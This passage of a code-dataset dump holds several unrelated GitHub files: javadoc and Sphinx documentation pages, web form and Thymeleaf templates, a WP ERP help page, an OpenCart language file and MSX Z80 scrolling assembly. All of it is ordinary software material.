text
stringlengths
2
99.7k
meta
dict
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="de"> <head> <!-- Generated by javadoc (1.8.0_231) on Sun Nov 17 02:10:20 CET 2019 --> <title>org.deidentifier.arx.framework.lattice Class Hierarchy</title> <meta name="date" content="2019-11-17"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="org.deidentifier.arx.framework.lattice Class Hierarchy"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/deidentifier/arx/framework/data/package-tree.html">Prev</a></li> <li><a href="../../../../../org/deidentifier/arx/gui/package-tree.html">Next</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/deidentifier/arx/framework/lattice/package-tree.html" target="_top">Frames</a></li> <li><a href="package-tree.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 class="title">Hierarchy For Package org.deidentifier.arx.framework.lattice</h1> <span class="packageHierarchyLabel">Package Hierarchies:</span> <ul class="horizontal"> <li><a href="../../../../../overview-tree.html">All Packages</a></li> </ul> </div> <div class="contentContainer"> <h2 title="Class Hierarchy">Class Hierarchy</h2> <ul> <li type="circle">java.lang.Object <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/DependentAction.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">DependentAction</span></a> <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/DependentAction.NodeActionConstant.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">DependentAction.NodeActionConstant</span></a></li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/DependentAction.NodeActionInverse.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">DependentAction.NodeActionInverse</span></a></li> </ul> </li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/ObjectIterator.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">ObjectIterator</span></a>&lt;T&gt; <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/ObjectIterator.ObjectIteratorIntArray.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">ObjectIterator.ObjectIteratorIntArray</span></a></li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/ObjectIterator.ObjectIteratorLong.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">ObjectIterator.ObjectIteratorLong</span></a></li> </ul> </li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/SolutionSpace.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">SolutionSpace</span></a>&lt;T&gt; <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/SolutionSpaceIntArray.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">SolutionSpaceIntArray</span></a></li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/SolutionSpaceLong.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">SolutionSpaceLong</span></a></li> </ul> </li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/Transformation.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">Transformation</span></a>&lt;T&gt; <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/TransformationIntArray.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">TransformationIntArray</span></a></li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/TransformationLong.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">TransformationLong</span></a></li> </ul> </li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/TransformationList.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">TransformationList</span></a>&lt;T&gt;</li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/deidentifier/arx/framework/data/package-tree.html">Prev</a></li> <li><a href="../../../../../org/deidentifier/arx/gui/package-tree.html">Next</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/deidentifier/arx/framework/lattice/package-tree.html" target="_top">Frames</a></li> <li><a href="package-tree.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
{ "pile_set_name": "Github" }
<% layout("/layouts/platform.html"){ %> <header class="header navbar bg-white shadow"> <div class="btn-group tool-button"> <a class="btn btn-primary navbar-btn" href="${base}/platform/sys/user" data-pjax id="goback"><i class="ti-angle-left"></i> 返回</a> </div> </header> <div class="content-wrap"> <div class="wrapper" style="min-height:500px;"> <section class="panel panel-form"> <form id="unitAddForm" role="form" class="form-horizontal parsley-form" data-parsley-validate action="${base}/platform/sys/user/editDo" method="post"> <div class="row mb10"> <div class="col-lg-12"> <div class="form-group has-feedback"> <label for="parentId" class="col-sm-2 control-label">所属单位</label> <div class="col-sm-8"> <div class="input-group"> <input id="parentId" type="text" class="form-control" placeholder="选择单位" disabled value="${obj.unit.name}" data-parsley-required="true"/> <span class="input-group-btn"> <button type="button" class="btn btn-primary <%if(!@shiro.hasRole('sysadmin')){%>disabled<%}%>" data-toggle="modal" data-target="#dialogSelectParentUnit"><i class="ti-plus"></i>选择 </button> </span> </div> <input type="hidden" name="id" value="${obj.id!}"> <input type="hidden" name="unitid" value="${obj.unitid!}"> <input type="hidden" name="oldLoginname" value="${obj.loginname!}"> </div> </div> <div class="form-group"> <label for="loginname" class="col-sm-2 control-label">用户名</label> <div class="col-sm-8"> <input type="text" id="loginname" value="${obj.loginname!}" class="form-control" name="loginname" data-parsley-required="true" placeholder="用户名"> </div> </div> <div class="form-group"> <label for="username" class="col-sm-2 control-label">姓名/昵称</label> <div class="col-sm-8"> <input type="text" id="username" class="form-control" name="username" data-parsley-required="true" placeholder="名称/昵称" value="${obj.username!}"> </div> </div> <div class="form-group"> <label for="email" class="col-sm-2 control-label">电子邮箱</label> <div class="col-sm-8"> <input type="text" id="email" name="email" value="${obj.email!}" data-parsley-type="email" class="form-control" placeholder="Email"> </div> </div> </div> </div> <div class="col-lg-3"></div> <div class="col-lg-6"> <div class="form-group text-center"> <label></label> <div> <button class="btn btn-primary btn-block btn-lg btn-parsley" data-loading-text="正在提交...">提 交</button> </div> </div> </div> </form> </section> </div> </div> <a class="exit-offscreen"></a> <!-- 选择上级单位 --> <div id="dialogSelectParentUnit" class="modal fade bs-modal-sm" tabindex="-1" role="dialog" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h4 class="modal-title">选择上级单位</h4> </div> <div class="modal-body"> <div class="row"> <div class="col-xs-12"> <div id="jsTreeParentUnit" class="demo"></div> </div> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-default" data-dismiss="modal">取 消</button> <button type="button" class="btn btn-primary" onclick="selectParentMenu()">确认选择</button> </div> </div> </div> </div> <script language="JavaScript"> function initTreeView() { $("#jsTreeParentUnit").jstree({ plugins: ["wholerow", "json_data"], core: { data: { dataType: "json", url: function (node) { return node.id === "#" ? "${base}/platform/sys/user/tree" : "${base}/platform/sys/user/tree?pid=" + node.id } }, multiple: false } }).on("dblclick.jstree", function (node) { selectParentMenu(); }); } //选择父菜单 function selectParentMenu() { var tree = $.jstree.reference("#jsTreeParentUnit"); var node = tree.get_selected(true); $("#unitAddForm #parentId").val(node[0].text); $("#unitAddForm input[name='unitid']").val(node[0].id); $("#dialogSelectParentUnit").modal("hide"); } $(document).ready(function () { initTreeView(); $('#unitAddForm').ajaxForm({ dataType: 'json', beforeSubmit: function (arr, form, options) { form.find("button:submit").button("loading"); }, success: function (data, statusText, xhr, form) { if (data.code == 0) { Toast.success(data.msg); setTimeout(function () { $("#goback").trigger("click"); }, 1000); } else { Toast.error(data.msg); } form.find("button:submit").button("reset"); } }); }); </script> <%}%>
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html xmlns:th="http://www.thymeleaf.org"> <head> <meta charset="UTF-8"> <title>Insert title here</title> </head> <body> <!-- See javadoc API for class org.thymeleaf.expression.Strings 字符串转换 ${#strings.toString(obj)} 检查字符串是否为空(或空)。在检查前执行trim()操作 也适用于数组、列表或集合 ${#strings.isEmpty(name)} ${#strings.arrayIsEmpty(nameArr)}//如果为null则返回null 如果里面数据为null则为false否则为true ${#strings.listIsEmpty(nameList)} ${#strings.setIsEmpty(nameSet)} 对字符串执行“isEmpty()”检查,如果为false,则返回该字符串,默认为 如果为真,则另一个指定的字符串。 也适用于数组、列表或集合 ${#strings.defaultString(text,default)} ${#strings.arrayDefaultString(textArr,default)} ${#strings.listDefaultString(textList,default)} ${#strings.setDefaultString(textSet,default)} 检查字符串中是否包含片段也适用于数组、列表或集合 ${#strings.contains(name,'ez')} // also array*, list* and set* ${#strings.containsIgnoreCase(name,'ez')} // also array*, list* and set* 检查字符串是以片段开头还是结尾也适用于数组、列表或集合 ${#strings.startsWith(name,'Don')} // also array*, list* and set* ${#strings.endsWith(name,endingFragment)} // also array*, list* and set* 子串相关操作也适用于数组、列表或集合 ${#strings.indexOf(name,frag)} // also array*, list* and set* ${#strings.substring(name,3,5)} // also array*, list* and set* ${#strings.substringAfter(name,prefix)} // also array*, list* and set* ${#strings.substringBefore(name,suffix)} // also array*, list* and set* ${#strings.replace(name,'las','ler')} // also array*, list* and set* 追加和预付也适用于数组、列表或集合 ${#strings.prepend(str,prefix)} // also array*, list* and set* ${#strings.append(str,suffix)} // also array*, list* and set* 变更大小写也适用于数组、列表或集合。 ${#strings.toUpperCase(name)} // also array*, list* and set* ${#strings.toLowerCase(name)} // also array*, list* and set* 拆分和连接 ${#strings.arrayJoin(namesArray,',')} ${#strings.listJoin(namesList,',')} ${#strings.setJoin(namesSet,',')} ${#strings.arraySplit(namesStr,',')} // returns String[] ${#strings.listSplit(namesStr,',')} // returns List<String> ${#strings.setSplit(namesStr,',')} // returns Set<String> Trim 还可用于数组、列表或集合 ${#strings.trim(str)} 计算长度也适用于数组、列表或集合。 ${#strings.length(str)} // also array*, list* and set* 缩写文本,使其最大大小为n。如果文本较大,则 将被裁剪并用“…”完成。 也适用于数组、列表或集合 ${#strings.abbreviate(str,10)} 将第一个字符转换为大写(反之亦然) ${#strings.capitalize(str)} // also array*, list* and set* ${#strings.unCapitalize(str)} // also array*, list* and set* 将每个单词的第一个字符转换为大写 ${#strings.capitalizeWords(str)} // also array*, list* and set* ${#strings.capitalizeWords(str,delimiters)} // also array*, list* and set* 转义字符串 ${#strings.escapeXml(str)} // also array*, list* and set* ${#strings.escapeJava(str)} // also array*, list* and set* ${#strings.escapeJavaScript(str)} // also array*, list* and set* ${#strings.unescapeJava(str)} // also array*, list* and set* ${#strings.unescapeJavaScript(str)} // also array*, list* and set* 空安全比较和连接 ${#strings.equals(first, second)} ${#strings.equalsIgnoreCase(first, second)} ${#strings.concat(values...)} ${#strings.concatReplaceNulls(nullValue, values...)} Random ${#strings.randomAlphanumeric(count)} --> <p th:text="${object}"></p> <p th:text="${#strings.toString(object)}"></p> <p th:text="${#strings.toString(numList)}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.isEmpty(name)}"></p> <p th:text="${#strings.arrayIsEmpty(nameArr)}"></p> <p th:text="${#strings.listIsEmpty(nameList)}"></p> <p th:text="${#strings.setIsEmpty(nameSet)}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.defaultString(text,'该值为null')}"></p> <p th:text="${#strings.arrayDefaultString(textArray,'该值为null')}"></p> <p th:text="${#strings.listDefaultString(textList,'该值为null')}"></p> <p th:text="${#strings.setDefaultString(textSet,'该值为null')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.contains('abcez','ez')}"></p> <p th:text="${#strings.containsIgnoreCase('abcEZ','ez')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.startsWith('Donabcez','Don')}"></p> <p th:text="${#strings.endsWith('Donabcezn','n')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.indexOf('abcefg','e')}"></p> <p th:text="${#strings.substring('abcefg',3,5)}"></p> <p th:text="${#strings.substringAfter('baceafg','a')}"></p> <p th:text="${#strings.substringBefore('bcaeefag','a')}"></p> <p th:text="${#strings.replace('lasabce','las','ler')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.prepend('abc','012')}"></p> <p th:text="${#strings.append('abc','456')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.toUpperCase('abc')}"></p> <p th:text="${#strings.toLowerCase('ABC')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.arrayJoin(namesArray,',')}"></p> <p th:text="${#strings.listJoin(namesList,',')}"></p> <p th:text="${#strings.setJoin(namesSet,',')}"></p> <p th:text="${#strings.arraySplit('a,b,c',',')}"></p> <p th:text="${#strings.listSplit('a,b,c',',')}"></p> <p th:text="${#strings.setSplit('a,b,c',',')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.trim(' abc ')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.length('abc')}"></p> <br>---------------------------------------------<br> <!-- 缩写文本,使其最大大小为n。如果文本较大,则将被裁剪并用“…”完成。也适用于数组、列表或集合 --> <p th:text="${#strings.abbreviate('12345678910',10)}"></p> <br>---------------------------------------------<br> <!-- 将第一个字符转换为大写(反之亦然) --> <p th:text="${#strings.capitalize('aBC')}"></p> <p th:text="${#strings.unCapitalize('Abc')}"></p> <br>---------------------------------------------<br> <!-- 将每个单词的第一个字符转换为大写 --> <p th:text="${#strings.capitalizeWords('abc bcd')}"></p> <!-- 第二个字符表示一什么进行分隔表示第二个单词 --> <p th:text="${#strings.capitalizeWords('abc,bcd',',')}"></p> <br>---------------------------------------------<br> <!-- 转义字符串 --> <p th:text="${#strings.escapeXml('<book>正面管教</book>')}"></p> <p th:text="${#strings.escapeJava('int i = 0')}"></p> <p th:text="${#strings.unescapeJava('int a = 0')}"></p> <p th:text="${#strings.escapeJavaScript('var a= 0;')}"></p> <p th:text="${#strings.unescapeJavaScript('var a= 0;')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.equals('a', 'b')}"></p> <p th:text="${#strings.equalsIgnoreCase('a', 'A')}"></p> <p th:text="${#strings.concat('a','b','c','d')}"></p> <p th:text="${#strings.concatReplaceNulls('#', 'a','b','c','d',null,null)}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.randomAlphanumeric(4)}"></p> </body> </html>
{ "pile_set_name": "Github" }
<div class="wrap"> <h1> <?php esc_html_e( 'HRM Help', 'erp' ); ?> <a href="https://wperp.com/docs/hr/" target="_blank" class="page-title-action"> <?php esc_html_e( 'View all Documentations', 'erp' ); ?> </a> </h1> <?php $erp_doc_sections = [ __( 'General', 'erp' ) => [ __( 'How to setup my company details in WP ERP?', 'erp' ) => 'https://wperp.com/docs/erp-core/settings/company/', __( 'How to disable any module (like-HRM, CRM or Accounting)?', 'erp' ) => 'https://wperp.com/docs/erp-core/settings/modules-management/', __( 'How to setup basic erp settings?', 'erp' ) => 'https://wperp.com/docs/erp-core/settings/global-settings/', __( 'How to translate WP ERP?', 'erp' ) => 'https://wperp.com/docs/erp-core/how-to-translate-wp-erp-plugin/', __( 'How to install developed version of WP ERP (github)?', 'erp' ) => 'https://wperp.com/docs/erp-core/installation/', ], __( 'Employee Management', 'erp' ) => [ __( 'How to add an employee?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/adding-employees/', __( 'How to add and manage departments?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/create-manage-department-hrm/', __( 'How to add and manage designation?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/creating-designations/', __( 'How to assign Department & Designation to employees?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/add-department-designation-employee/', __( 'How to manage permissions for the employees?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/permission-management/', ], __( 'Leave Management', 'erp' ) => [ __( 'How to create Leave Policy?', 'erp' ) => 'https://wperp.com/docs/hr/leave-management/create-leave-policy/', __( 'How to create Leave Entitlement?', 'erp' ) => 'https://wperp.com/docs/hr/leave-management/leave-entitlements/', __( 'How to create Leave Request?', 'erp' ) => 'https://wperp.com/docs/hr/leave-management/creating-leave-requests/', __( 'How to Manage (Accept / Reject) Leave Requests?', 'erp' ) => 'https://wperp.com/docs/hr/leave-management/managing-requests/', ], __( 'Miscellaneous', 'erp' ) => [ __( 'How to create announcement?', 'erp' ) => 'https://wperp.com/docs/hr/announcement/', __( 'How to setup working days for the employees?', 'erp' ) => 'https://wperp.com/docs/hr/settings/work-days/', __( 'How to generate reports?', 'erp' ) => 'https://wperp.com/docs/hr/reporting/', __( 'Do you have any video tutorial on HRM?', 'erp' ) => 'https://wperp.com/tv/category/hr/', ], ]; $sections = apply_filters( 'erp_hr_help_docs', $erp_doc_sections ); if ( ! empty( $sections ) ) { ?> <div id="dashboard-widgets-wrap"> <div id="dashboard-widgets" class="metabox-holder"> <?php foreach ( $sections as $section_title => $docs ) { ?> <div class="erp-help-section postbox-container"> <div class="metabox-holder"> <div class="meta-box-sortables"> <div class="postbox"> <h2 class="hndle"><?php echo esc_html( $section_title ); ?></h2> <?php if ( !empty( $docs ) ) { ?> <div class="erp-help-questions"> <ul> <?php foreach ( $docs as $title => $link ) { ?> <?php $tracking_url = add_query_arg( [ 'utm_source' => 'doc', 'utm_medium' => 'erp', 'utm_campaign' => 'manik', 'utm_content' => 'aion', ], untrailingslashit( $link ) ); ?> <li><a href="<?php echo esc_url_raw( $tracking_url ); ?>" target="_blank"><?php echo esc_html( $title ); ?> <span class="dashicons dashicons-arrow-right-alt2"></span></a></li> <?php } ?> </ul> </div> <?php } ?> </div> </div> </div> </div> <?php } ?> </div> </div> <?php } else { ?> <?php } ?> </div> <style type="text/css" media="screen"> .erp-help-questions li { margin: 0; border-bottom: 1px solid #eee; } .erp-help-questions li a { padding: 10px 15px; display: block; } .erp-help-questions li a:hover { background-color: #F5F5F5; } .erp-help-questions li:last-child { border-bottom: none; } .erp-help-questions li .dashicons { float: right; color: #ccc; margin-top: -3px; } @media screen and (min-width: 960px) { .erp-help-section .postbox-container{ width: 100% !important; } .erp-help-section:nth-child(odd){ clear:both !important; } } </style>
{ "pile_set_name": "Github" }
<?php // Heading $_['heading_title'] = '<font color="#263238"><b><i class="fa fa-map-marker"></i>&nbsp;&nbsp;&nbsp;Materialize "Карта"</b></font>'; $_['map_title'] = 'Materialize "Карта"'; // Text $_['text_module'] = 'Модули'; $_['text_success'] = 'Настройките на модула са обновени!'; $_['text_edit'] = 'Редактиране на Materialize Карта'; $_['text_coordinates'] = 'Координати'; $_['text_google_map'] = 'Google Maps'; $_['text_yandex_map'] = 'Yandex.Maps'; $_['entry_map'] = 'Карти'; $_['entry_api'] = 'Google API Key'; $_['entry_lat'] = 'Latitude'; $_['entry_lng'] = 'Longitude'; $_['entry_description'] = 'Описание'; $_['entry_icon_pin'] = 'Икона Pin'; $_['entry_icon_size'] = 'Икона размери'; $_['entry_width'] = 'Икона дължина'; $_['entry_height'] = 'Икона височина'; $_['entry_color_btn'] = 'Преглед на картата'; $_['entry_status'] = 'Статус'; // Help $_['help_google_map'] = 'За да използвате <b>Google Maps</b>, трябва да получите <b>Google API Key</b> от <a href="//goo.gl/nhMAUA" target="_blank" rel="noopener"><b>this link</b></a> и да го въведете ръчно в съответното поле.'; $_['help_coordinates'] = 'Посочете координатите за Latitude, и Longitude.'; $_['help_icon_size'] = 'Първо, укажете дължината, а след това и височината на иконата в пиксели.'; // Error $_['error_permission'] = 'Нямате разрешение да управлявате този модул!'; $_['error_google_api'] = 'Въведете вашият <b>Google API Key!</b>'; $_['error_geo_lat'] = 'Въведете <b>latitude!</b>'; $_['error_geo_lng'] = 'Въведете <b>longitude!</b>';
{ "pile_set_name": "Github" }
; ; ANSI Video handling for the MSX ; ; Handles colors ; ; Scrollup ; ; Stefano Bodrato - Sept. 2017 ; ; $Id: f_ansi_scrollup_nobios.asm $ ; SECTION code_clib PUBLIC ansi_SCROLLUP PUBLIC __tms9918_scroll_buffer EXTERN __tms9918_attribute EXTERN LDIRVM EXTERN LDIRMV EXTERN FILVRM .ansi_SCROLLUP push ix ld b,23 ld hl,256 .scloop push bc push hl ld de,__tms9918_scroll_buffer ld bc,256 call LDIRMV pop hl push hl ld de,-256 add hl,de ld de,__tms9918_scroll_buffer ld bc,256 ex de,hl call LDIRVM pop hl push hl ld de,8192 add hl,de push hl ld de,__tms9918_scroll_buffer ld bc,256 call LDIRMV pop hl ld de,-256 add hl,de ld de,__tms9918_scroll_buffer ld bc,256 ex de,hl call LDIRVM pop hl inc h pop bc djnz scloop dec h xor a ld bc,256 call FILVRM pop ix ret SECTION bss_clib .__tms9918_scroll_buffer defs 256
{ "pile_set_name": "Github" }
<!DOCTYPE html> <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]--> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>btgym.algorithms.nn.ae &mdash; BTGym 0.0.7 documentation</title> <link rel="stylesheet" href="../../../../_static/css/theme.css" type="text/css" /> <link rel="index" title="Index" href="../../../../genindex.html"/> <link rel="search" title="Search" href="../../../../search.html"/> <link rel="top" title="BTGym 0.0.7 documentation" href="../../../../index.html"/> <link rel="up" title="Module code" href="../../../index.html"/> <script src="../../../../_static/js/modernizr.min.js"></script> </head> <body class="wy-body-for-nav" role="document"> <div class="wy-grid-for-nav"> <nav data-toggle="wy-nav-shift" class="wy-nav-side"> <div class="wy-side-scroll"> <div class="wy-side-nav-search"> <a href="../../../../index.html" class="icon icon-home"> BTGym </a> <div class="version"> 0.0.7 </div> <div role="search"> <form id="rtd-search-form" class="wy-form" action="../../../../search.html" method="get"> <input type="text" name="q" placeholder="Search docs" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation"> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html">Package Description</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#installation">Installation</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#quickstart">Quickstart</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#problem-definition">Problem definition</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#environment-engine-description">Environment engine description</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#data-flow-structure">Data flow structure</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#a3c-framework-description">A3C framework description</a></li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.envs.html">btgym.envs package</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.html">btgym.dataserver module</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.html#module-btgym.server">btgym.server module</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.html#module-btgym.spaces">btgym.spaces module</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.strategy.html">btgym.strategy package</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.monitor.html">btgym.monitor package</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.rendering.html">btgym.rendering package</a></li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.datafeed.html">btgym.datafeed package</a></li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.algorithms.html">btgym.algorithms package</a></li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.research.html">btgym.research package</a></li> </ul> </div> </div> </nav> <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"> <nav class="wy-nav-top" role="navigation" aria-label="top navigation"> <i data-toggle="wy-nav-top" class="fa fa-bars"></i> <a href="../../../../index.html">BTGym</a> </nav> <div class="wy-nav-content"> <div class="rst-content"> <div role="navigation" aria-label="breadcrumbs navigation"> <ul class="wy-breadcrumbs"> <li><a href="../../../../index.html">Docs</a> &raquo;</li> <li><a href="../../../index.html">Module code</a> &raquo;</li> <li>btgym.algorithms.nn.ae</li> <li class="wy-breadcrumbs-aside"> </li> </ul> <hr/> </div> <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article"> <div itemprop="articleBody"> <h1>Source code for btgym.algorithms.nn.ae</h1><div class="highlight"><pre> <span></span><span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="nn">np</span> <span class="kn">import</span> <span class="nn">tensorflow</span> <span class="k">as</span> <span class="nn">tf</span> <span class="kn">from</span> <span class="nn">tensorflow.contrib.layers</span> <span class="k">import</span> <span class="n">flatten</span> <span class="k">as</span> <span class="n">batch_flatten</span> <span class="kn">from</span> <span class="nn">tensorflow.contrib.layers</span> <span class="k">import</span> <span class="n">layer_norm</span> <span class="k">as</span> <span class="n">norm_layer</span> <span class="kn">from</span> <span class="nn">btgym.algorithms.nn.layers</span> <span class="k">import</span> <span class="n">normalized_columns_initializer</span><span class="p">,</span> <span class="n">linear</span><span class="p">,</span> <span class="n">conv2d</span> <div class="viewcode-block" id="conv2d_encoder"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.conv2d_encoder">[docs]</a><span class="k">def</span> <span class="nf">conv2d_encoder</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">layer_config</span><span class="o">=</span><span class="p">(</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">),</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;encoder&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Defines convolutional encoder.</span> <span class="sd"> Args:</span> <span class="sd"> x: input tensor</span> <span class="sd"> layer_config: first to last nested layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> 